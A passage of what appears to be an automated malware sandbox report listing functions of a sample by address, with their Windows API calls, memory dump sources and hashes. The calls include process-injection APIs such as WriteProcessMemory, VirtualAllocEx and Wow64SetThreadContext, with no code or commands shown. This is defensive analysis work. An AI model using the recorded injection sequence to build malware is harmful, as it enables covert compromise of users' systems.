                                                • Opcode Fuzzy Hash: 004aed8b32d729a59aa824c9316db4eb053c70043a8e8f69185fc19d40ba5de3
                                                • Instruction Fuzzy Hash: DC2135B1900259DFCB10CFAAC885BEEBBF5FF48310F20842AE958A7250D7759945CBA4
                                                Function 0755BA90 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0755BB16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 448efdd64251fc8ac077f021153787087d922b58fc9707b8c2a7895e9db90f65
                                                • Instruction ID: ce0b33c798e7384b1d933b1b85e7e30b8fb3f22602e8c645fb0603e06dc1cb40
                                                • Opcode Fuzzy Hash: 448efdd64251fc8ac077f021153787087d922b58fc9707b8c2a7895e9db90f65
                                                • Instruction Fuzzy Hash: 482169B19002098FDB10DFA9C4857EEBBF5FF88324F24842AD458A7240CB789945CBA4
                                                Function 0755BC30 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0755BCC0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: a4d38f3083a1e5add38689f468c2c81d64ebf0e54b8ecd95e3d32d112405133f
                                                • Instruction ID: a0ef43fe94a21ca71e44dfb7c93ac2bf3271913fc8d65ab0b038a7a7eda3ee22
                                                • Opcode Fuzzy Hash: a4d38f3083a1e5add38689f468c2c81d64ebf0e54b8ecd95e3d32d112405133f
                                                • Instruction Fuzzy Hash: 752139B1D0035A9FCB10CFA9C885BDEBBF5FF48310F10842AE959A7250D7789944CBA4
                                                Function 0102D27C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0102D656,?,?,?,?,?), ref: 0102D717
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: f3547efff7a067678498527cd6911437a6c48a3b81729cba295bcf650f6aa3ce
                                                • Instruction ID: 9b6a77dc042cce8fae51b823e6263f7020ae13a4326350acfcf36be0adbe4e1d
                                                • Opcode Fuzzy Hash: f3547efff7a067678498527cd6911437a6c48a3b81729cba295bcf650f6aa3ce
                                                • Instruction Fuzzy Hash: D52103B5900258DFDB10CFAAD484ADEBBF8FB48310F14801AE958A7310D378A940CFA5
                                                Function 0755BD20 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0755BDA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: cb642ed329b9bf599af42379b35b9b9e8fa823f69ec4350bf76e047980770949
                                                • Instruction ID: 0979f68c32e9b595c3dfcb8c203febedd1029c6e424770c5755d7c14f1fb983c
                                                • Opcode Fuzzy Hash: cb642ed329b9bf599af42379b35b9b9e8fa823f69ec4350bf76e047980770949
                                                • Instruction Fuzzy Hash: 432128B1C002599FCB10DFAAC885BDEFBF5FF88310F10842AE958A7250C7749544CBA5
                                                Function 0755BA98 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0755BB16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 22e25b49192f84f9c0d959d2c75c123b15d53c6bc0a8c6af9f4c57195c72e028
                                                • Instruction ID: 48832ebc6406bb2637a816f6166ffc0d007ed1a3baa1d14a985ddda75e705b7f
                                                • Opcode Fuzzy Hash: 22e25b49192f84f9c0d959d2c75c123b15d53c6bc0a8c6af9f4c57195c72e028
                                                • Instruction Fuzzy Hash: 732138B1D002098FDB10DFAAC4857EEBBF4FF88324F14842AD459A7240CB789944CFA5
                                                Function 0102D689 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0102D656,?,?,?,?,?), ref: 0102D717
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: c5b33e01b3a359b1d44df13665b15d47050845cc9512ce483226306b27f67e83
                                                • Instruction ID: 3c881fabe0d6915d911b280e75f594a8658916f0a833360f35b57f418e5f3f19
                                                • Opcode Fuzzy Hash: c5b33e01b3a359b1d44df13665b15d47050845cc9512ce483226306b27f67e83
                                                • Instruction Fuzzy Hash: E221E2B5D002599FDB10CFA9D585ADEBFF5FB48314F14842AE958A7210D378A940CFA4
                                                Function 0755BB6B Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0755BBDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: db8b752996299387bc629c45b98992735effad0821c3f10e985af6053d5fa7ec
                                                • Instruction ID: 6536a7af06b7f77ad5e2c69a8bfd2b6d672be21f92eba546e4d01fbaeeb924c6
                                                • Opcode Fuzzy Hash: db8b752996299387bc629c45b98992735effad0821c3f10e985af6053d5fa7ec
                                                • Instruction Fuzzy Hash: E7118CB18002499FCB10DFA9C445BDEBFF5EF88320F10841AE455A7250CB759540CFA5
                                                Function 0102A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0102B079,00000800,00000000,00000000), ref: 0102B28A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: dbb29149d2ede08c3e83823ec3e789721da177bd3628baaff88e3caaa1d0014f
                                                • Instruction ID: 5bd12fba055ed3a785e5efe8ab96623e2f06c1d2cacc82fff19a21b314e527a1
                                                • Opcode Fuzzy Hash: dbb29149d2ede08c3e83823ec3e789721da177bd3628baaff88e3caaa1d0014f
                                                • Instruction Fuzzy Hash: AB1123B6D003198FDB10CFAAC444BDEFBF8EB89310F10842AE959A7210C3B5A545CFA5
                                                Function 0102B219 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0102B079,00000800,00000000,00000000), ref: 0102B28A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 026a116aa8804cc735bb9f166f95479f6886263e1c158a8bedbae37bd8bb5cb5
                                                • Instruction ID: e8be988bd2bdb6e856690f4525c5b396f134c078d44357706f61b74551dc32ee
                                                • Opcode Fuzzy Hash: 026a116aa8804cc735bb9f166f95479f6886263e1c158a8bedbae37bd8bb5cb5
                                                • Instruction Fuzzy Hash: 021126B6C003199FDB10CF9AC444BDEFBF4EB88310F14842AD559A7210C375A544CFA5
                                                Function 0755BB70 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0755BBDE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 70f54de03814bfa2511bd625e72e73bea06c32f033f6494d223c3e173ae0e533
                                                • Instruction ID: 027badc52c225bf0c7a2798c37d90eb300fc484745f4250f85f70ca899de9472
                                                • Opcode Fuzzy Hash: 70f54de03814bfa2511bd625e72e73bea06c32f033f6494d223c3e173ae0e533
                                                • Instruction Fuzzy Hash: C2116AB18002499FCB10DFAAC845BDFBFF5EF88324F10841AE515A7250C7759940CFA5
                                                Function 0755B9E0 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 52824123dff3ec1c498305084d146de3591dbc17d0cf8cae3603d93fc7c953ef
                                                • Instruction ID: 7740eec48677dc0cf396d942884838892026abe39f8caa0030371103acba7563
                                                • Opcode Fuzzy Hash: 52824123dff3ec1c498305084d146de3591dbc17d0cf8cae3603d93fc7c953ef
                                                • Instruction Fuzzy Hash: 7B1146B19002498BDB20DFA9C4457DEFBF4EB88324F24841AD459A7250CB78A544CB95
                                                Function 0755B9E8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 26db8bb14d2dfee383b24c0a9fb3ca58dcd07dda18ae3fc9eece2959cfb13cdb
                                                • Instruction ID: 7e8222208f36a1c8f0aa55db67550f405ba9f0c9e4712b02a75bd45ac289a05f
                                                • Opcode Fuzzy Hash: 26db8bb14d2dfee383b24c0a9fb3ca58dcd07dda18ae3fc9eece2959cfb13cdb
                                                • Instruction Fuzzy Hash: 8C1136B1D003598FDB20DFAAC4457DEFBF4EB88324F24842AD459A7250CB75A944CFA5
                                                Function 0102AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0102AFFE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: b60a332df95da76ad8882caaffe3fbe4ec6234f0d666bac741a6474dd2a3fe85
                                                • Instruction ID: 58fe4020ff9f4dde267306cf3a4bf0be9e631fcb7abdfc87636eee9fa9e5096f
                                                • Opcode Fuzzy Hash: b60a332df95da76ad8882caaffe3fbe4ec6234f0d666bac741a6474dd2a3fe85
                                                • Instruction Fuzzy Hash: BF1110B6C002598FDB14CF9AC444BDEFBF4AB88324F14846AD968A7610D379A545CFA1
                                                Function 0755A558 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0755E5DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: d6b8b57d1bc4a8e6b952cab1baa2ee4ff0e6ad75cdbee0e0be6c7da3c66b4550
                                                • Instruction ID: e987e29ea9ba24623e354d5578f898a902b9124e6eec52421feb951806aa5e66
                                                • Opcode Fuzzy Hash: d6b8b57d1bc4a8e6b952cab1baa2ee4ff0e6ad75cdbee0e0be6c7da3c66b4550
                                                • Instruction Fuzzy Hash: B31106B5800359DFDB10DF99C485BDEBBF8FB48324F10841AE958A7200D375AA44CFA5
                                                Function 0755E579 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0755E5DD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 26099c312b06fefe62b6fa6ebfd9e9f52a99fe70cdf000f38d375d0e968f5898
                                                • Instruction ID: 14ece6f83df795dafe55f4e133702fdf99c0e304317de0c85ffa42e6690cc1b8
                                                • Opcode Fuzzy Hash: 26099c312b06fefe62b6fa6ebfd9e9f52a99fe70cdf000f38d375d0e968f5898
                                                • Instruction Fuzzy Hash: FC1113B58002599FCB10CF99D485BDEBFF8FB48310F14841AE958A7210D375A640CFA1
                                                Function 00FCD3D8 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754015210.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fcd000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2cc086886811270478da30abca5f29d735f019605f66d6edd988afed9b59a963
                                                • Instruction ID: 7cba3408116bbc5af9e1fdf2f110d2035d780ef9131988ef8e17b6f7d83842eb
                                                • Opcode Fuzzy Hash: 2cc086886811270478da30abca5f29d735f019605f66d6edd988afed9b59a963
                                                • Instruction Fuzzy Hash: 21212872500205DFDB09DF14DAC1F2ABF65FB94324F20C17DDA094B256C336E856E6A2
                                                Function 00FDD01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754051829.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fdd000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1bfd78dd97888243996c0768bcd1eb321d9da99813b520a7833580b5c899e068
                                                • Instruction ID: e517475a12d87cf13953d2a609d75d070ad05918519d1d4867678dca80912f85
                                                • Opcode Fuzzy Hash: 1bfd78dd97888243996c0768bcd1eb321d9da99813b520a7833580b5c899e068
                                                • Instruction Fuzzy Hash: 1E21F571504200DFCB14DF14D988B16BB66EBC4324F28C56AD80A4B35AC336D847DA61
                                                Function 00FDD1D4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754051829.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fdd000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: da42eea055916547c91673dc7249f52f71ca4c0f6e60eaa3a847b5a6231dc7d6
                                                • Instruction ID: ab0fe355438f4894d035d3e18d86050b3eccfa9f9398c356a9923dadc787aa00
                                                • Opcode Fuzzy Hash: da42eea055916547c91673dc7249f52f71ca4c0f6e60eaa3a847b5a6231dc7d6
                                                • Instruction Fuzzy Hash: 66212671944204EFDB05DF14D9C0B26BBA6FB84324F28C66EE8494B396C336D846EA61
                                                Function 00FDD005 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754051829.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fdd000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d317d79e5f8f45398a8f228dfe8c51ec59cf093726417a6b7945f3edb88ecb9
                                                • Instruction ID: 6f1467f951a013eb91d40d00d847a047739b6a619c3d09015ec8bfa9cc97d5d6
                                                • Opcode Fuzzy Hash: 3d317d79e5f8f45398a8f228dfe8c51ec59cf093726417a6b7945f3edb88ecb9
                                                • Instruction Fuzzy Hash: B92183755093808FC712CF24D594715BF71EB46314F28C5EBD8498F6A7C33A980ACB62
                                                Function 00FCD3D3 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754015210.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fcd000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction ID: 42e924271af87e70bede3bc7a861002bd56165e2d8aae147d7fc277a08c58675
                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                • Instruction Fuzzy Hash: 2A110372804240DFCB06CF00DAC4B1ABF71FB94324F24C2ADD9090B256C33AE85ADBA1
                                                Function 00FDD1CF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754051829.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fdd000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 9ab4365750fcd238b6e859c051703936f28d32665d5afc04ae8f35076e930c49
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: F1118B75904280DFDB16CF14D9C4B15BBB2FB84324F28C6AAD8494B796C33AD84ADB61
                                                Function 00FCD759 Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754015210.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fcd000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a3b367b6069d02d64bd20461290a94e5e10e2cd361b624210f9b5d6e416bb98
                                                • Instruction ID: 87b282ef1dd6c12bed7ed76a523cb65188956952e17e98d03822f72d9b50fd5e
                                                • Opcode Fuzzy Hash: 4a3b367b6069d02d64bd20461290a94e5e10e2cd361b624210f9b5d6e416bb98
                                                • Instruction Fuzzy Hash: 5A01A7724093419AE7105A29CE85F6BFFD8EF51334F18C53EED094A286C779D840D6B1
                                                Function 00FCD758 Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754015210.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fcd000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4bc911827a091c3c41befe2b476e8e0f53d772e33a05c6302d043984d0e58b99
                                                • Instruction ID: 0cd7252d1bb36877ead3f58ebe54f8fab08fa70e96e9fbe86a822f6e824d6a70
                                                • Opcode Fuzzy Hash: 4bc911827a091c3c41befe2b476e8e0f53d772e33a05c6302d043984d0e58b99
                                                • Instruction Fuzzy Hash: 43F06271405344AEE7108A1ADD84B66FFA8EF91734F18C45AED084A286C3799844DAB1

                                                Non-executed Functions

                                                Function 05330040 Relevance: .3, Instructions: 315COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1756552176.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_5330000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2d261f8500520a0d6b47770196b20eeadd0d5306b1a27dd17a558af3be72e515
                                                • Instruction ID: f0ce5995af576c764c8dea886381a4263ecfabb8366c83a282df6e101c294c0c
                                                • Opcode Fuzzy Hash: 2d261f8500520a0d6b47770196b20eeadd0d5306b1a27dd17a558af3be72e515
                                                • Instruction Fuzzy Hash: 4C12A4B0C81B46DAD310CF65EA4C3893BB1BB4539CBD0CB09D2616B6E5DBB8156ACF44
                                                Function 07559588 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c828d88da7a43ad029669dac9eda91367725879a55a81e7a50912d0a20b8a328
                                                • Instruction ID: 2785d0ba3896aa5ae1de70542b3d221551f3b34157bf3e9728a774f50d277049
                                                • Opcode Fuzzy Hash: c828d88da7a43ad029669dac9eda91367725879a55a81e7a50912d0a20b8a328
                                                • Instruction Fuzzy Hash: 4AE1F8B4E001198FCB14DFA9C5909AEBBF2FF89304F24816AE814AB356D735AD41CF61
                                                Function 07559150 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d03cb8e4bcaad5d4996eeadf572004fa949b1d526b05caaa71ffe90d80930ef7
                                                • Instruction ID: af02b8a0307d9c7ec955a5ba70e90c25054d93a76ebae5e1fbef9f54d0edd961
                                                • Opcode Fuzzy Hash: d03cb8e4bcaad5d4996eeadf572004fa949b1d526b05caaa71ffe90d80930ef7
                                                • Instruction Fuzzy Hash: E2E1C7B4E00119CFCB14DFA9C5909AEBBB2FF89304F24816AE815AB356D735AD41CF61
                                                Function 0755B1C0 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a221a20edd9bfded93f1b9200190bacc4cbf4d74468729281c77f674119c9c76
                                                • Instruction ID: be37d38a7b7dc6fa50c04d13066c2c13e958077b3dee799bb13eb06907889cae
                                                • Opcode Fuzzy Hash: a221a20edd9bfded93f1b9200190bacc4cbf4d74468729281c77f674119c9c76
                                                • Instruction Fuzzy Hash: 68E1D8B4E001198FCB14DFA9C5949AEBBF2FF49304F24816AE814AB356D731AD41CF61
                                                Function 0755AD88 Relevance: .3, Instructions: 312COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f34da598a4de14e0cd230260a2a59a3763aaf5c34c04dc7106157b8f789b98a5
                                                • Instruction ID: 74b8ced9fcfa4c7c633bca1d4c6fc71a08690c9e0d2dc6961122a20fa140b821
                                                • Opcode Fuzzy Hash: f34da598a4de14e0cd230260a2a59a3763aaf5c34c04dc7106157b8f789b98a5
                                                • Instruction Fuzzy Hash: 88E1B9B4E001198FDB14DFA9C5949AEBBF2FF89304F24815AE814AB356D731AD41CFA1
                                                Function 07550FC0 Relevance: .3, Instructions: 270COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1758543029.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7550000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7cbe33c793c0f08a3eadad64bd8a419d175624fddd7560f2fee31fdee433c28e
                                                • Instruction ID: 2efa4d26ee8a5d3d27a1359dcc87cf640b7210a155abb7edbd5c7bbe5f692434
                                                • Opcode Fuzzy Hash: 7cbe33c793c0f08a3eadad64bd8a419d175624fddd7560f2fee31fdee433c28e
                                                • Instruction Fuzzy Hash: DFD1263581065A8ACB10EFB4D990A9DF771FF95300F11C79AE0097B265EB70AAD5CF81
                                                Function 0102D5BC Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1754159534.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1020000_dGHiTqj3AB.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 623cd5bedb9a579bf3fbda6086a342039511ddf3ef93b5aae3ceffb7c6fa9982
                                                • Instruction ID: 6d471a9156c085bfb01d6df599c4d4564aaac385bdfb193013e2459b930b98b1
                                                • Opcode Fuzzy Hash: 623cd5bedb9a579bf3fbda6086a342039511ddf3ef93b5aae3ceffb7c6fa9982
                                                • Instruction Fuzzy Hash: 30A19132E002268FCF05DFB4C8445DEBBF2FF89344B2445AAE905AB261DB71E915CB80
                                                Function 07550FD0 Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
